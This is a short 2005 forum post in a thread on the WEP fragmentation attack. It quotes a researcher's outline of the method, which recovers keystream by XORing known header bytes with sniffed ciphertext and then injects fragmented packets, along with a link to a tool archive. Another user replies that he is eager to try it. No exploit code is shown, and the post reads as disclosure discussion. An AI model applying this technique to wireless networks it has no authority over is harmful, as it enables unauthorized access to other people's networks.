Thread: WEP fragmentation attack
View Single Post
Old 09-23-2005   #2 (permalink)
renderman
Drunken Stumbler
 
renderman's Avatar
 
Join Date: Jun 2002
Location: Anywhere but Utah
Posts: 1,802
Quote:
Originally Posted by sorbo
It is possible to send arbitrary data [any length and content] on a WEP network after having eavesdropped a single data packet.

http://darkircop.org/frag-0.1.tgz

The idea is:
Sniff first 8 bytes of cipher-text on packet with IV X.
XOR cipher-text with 8 bytes of clear-text:
AA AA 03 00 00 00 08 {00/06} depending if IP/ARP.
Send data in 802.11 fragments of 4 data bytes + 4 CRC32 bytes all encrypted using the PRGA recovered and with IV X.
I take it that this is what was released at toorcon last week. Been looking forward to checking it out.
renderman is offline   Reply With Quote